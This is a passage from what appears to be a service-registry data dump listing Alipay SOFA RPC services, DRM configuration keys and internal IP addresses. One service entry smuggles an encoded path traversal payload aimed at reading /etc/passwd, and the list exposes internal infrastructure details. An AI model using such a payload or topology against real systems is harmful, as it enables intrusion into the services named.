#SOFA","com.alipay.promobench.common.service.facade.service.PrizeBudgetMappingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_activityDiscountCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordercore.mrch.common.service.api.bdcrm.BdcrmTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACCTRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:kmi-client@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.info.InstInfoService:1.0:pcinstecoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.mng.serial.CommonSerialNoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.market.manage.FwOfferingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.YebFundLogicRealDbConfigRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:channelCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.MerchantCommonService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.ResourceStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.file.processor.strategy.wget.WgetParameters.httpUrlPrefix,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinbaseprod.biz.service.gw.antsearch.api.AntSearchStatisticsManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:caprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACIAMCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.VerifyProductManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-zhubfaceweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.fortuneLuckGoldFundVoucherStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchservbase.biz.service.biztask.facade.BizTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.common.service.facade.shop.api.QueryShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afts.common.service.facade.SchedulerWorkerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.product.contract.ProductContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.theme.ThemeQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ALIFI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mymdp.common.service.facade.mpscore.service.model.MpsModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthGroundNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcontentprod.facade.service.dynamic.DynamicElementManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.dynamiccode.IotQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeexprod.facade.EbppMerchantConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:linkall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.facade.service.ThanatosQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityidentify.certcmd.facade.CertCmdService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:income@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.common.logsim.tcctrigger.OeEmulatorTccThirdPartyTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexpprod.service.facade.api.settlement.GatewayQueryRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.FinDataOperatService:1.0:fcfluxsetting@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:SmcpProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CSACCURATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbopenprod.common.service.facade.open.AuthCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_access_operationManagerGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrderLinkSyncArDRM.adjustSyncAr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_AMSPM#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.rcacheTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insapportion.common.service.facade.ApportionReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PolicyInstanceFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.132.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincorecheck.common.service.facade.bizcheck.TradeCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapSessionService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.conCurrentPer,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilitycore.facade.admin.SceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.p2p.user.service.InvestorCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.writeoff.CfpPbcDishonorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfmac@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clive.common.service.facade.api.ImageService:1.0:clive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.TenantParameterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.97.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fraudmng.common.service.facade.event.EventManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filefactory.service.facade.FilePlatformParseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.api.CodeApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insendorseprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamweb.common.service.facade.common.IamWebSystemParamsServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.omoaidbase.common.service.facade.videocall.VideoCallTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.littleapp.LittleAppAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.195.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifin:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbill.facade.service.PcreditBillAccountBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.withdraw.api.ApplySyncContractBacsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publictest.facade.uniform.UniformDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:dchainassetreg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:NEWRULEVELOCITY@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopCategoryLeafValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydatastudio:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insptmarket.facade.module.api.RecommendModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.102.208.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.cashback.service.facade.DeposerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicIdentityTranslatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.drm.BizCertifyRuleGreySwitch.needCompare,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ordermng.common.service.api.merchant.IndustryPoolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_ZPROXY_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.manager.AuthManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.d9546.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tairmanager.interfaces.endpoint.facade.rest.user.UserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscommunity.common.service.facade.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsmng.common.service.facade.oss.OssClientManager:1.0:bkOssClientManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserControlRightQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.fundprod.bizfacade.FundBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianFlushPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.SwitchCoreService:1.0:4234@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbordersync.common.service.facade.spi.CloseNotifyProcessCallback:1.0:mappprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.148.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.merchant.MrchProdSwitchCoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:iprodquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcpromochannel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobatch.common.service.task.facade.SingleTaskManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.KBRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:insclaiminvestcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zdataquery.common.service.facade.MerchantShopQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pvsofabootserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.cif.client.drm.CifFixedQuerySwitcher.fixedMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.kashi.task.LcjTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.upgrade.UpgradeTo23VersionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcReconProgressQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.channel.spi.ChannelValidateProductCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.finassetcore.ZCBStatisticsQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumequery.common.service.facade.FundItemRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.spcenter.facade.bd.BdEmployeeOrganizationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterHgCheckStatisticalAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.upload.PhotoUploadManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.175.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpaas.zappinfo.facade.query.ApplicationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.fullAccessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.whiteIdListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.199.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_repository_qaKnowledgeGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.93.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.falcon.common.facade.LoadTestInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityProjectChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserVisitMentalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.autoaccess.ExternalSystemInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.AppFlagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inscommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certifymng.service.facade.TfsFileOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.maxKoiRewardQuerySize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.psslip.facade.api.SlipAmountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.shop.admin.ShopQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.connection.CompanyConnectionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.BlackItemUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:katongprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:erecon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.parser.ContentParserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.outflux.OutfluxResponseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.core.engine.service.ReportEngineService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.gzone.InfluxShortSerialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.ContentManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeConfigManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antresourcetwa.api.MorphoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fscdmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoCompanyCityRelationFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.RefundQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.appcenter.ResourceInfoManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.ScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-goldgiftprepromotwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.zhihuPropagationLevelMid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_PCLOANPROMO#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitSubRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WSOrderRecoveryDRMResource.intervalMin,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.picasso.common.service.facade.material.MaterialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:checkservice-app#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.filex.exchange.FileExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:insopenprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.GeneralQcRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insservicbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.clientSwitchOnLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradeexprod.common.service.plugin.connector.FastpayPluginInvokeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.156.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_F_FRSERVCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscommunity.common.service.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.community.FeedUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanElectronicSignatureCmd.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.148.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeCustodyManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvPlanManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_IINNERTRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.erecon.common.service.facade.api.RegisterInstItemFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.userNewQueue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.channelspop.service.decision.workbench.channel.ChannelGridFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.biz.service.impl.manage.MarketReportManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.antchain.myentcore.common.service.facade.api.TPPService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.securitydatastudio.versaiotestDS.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundboss.common.service.facade.drillreport.FundDrillReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.itemleads.ItemLeadsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:assetfluxdecision@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:coffeepay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.core.config.cache.service.AgentMigrationStatusSwitchCache:1.0@XFIRE#@#DEFAULT_INST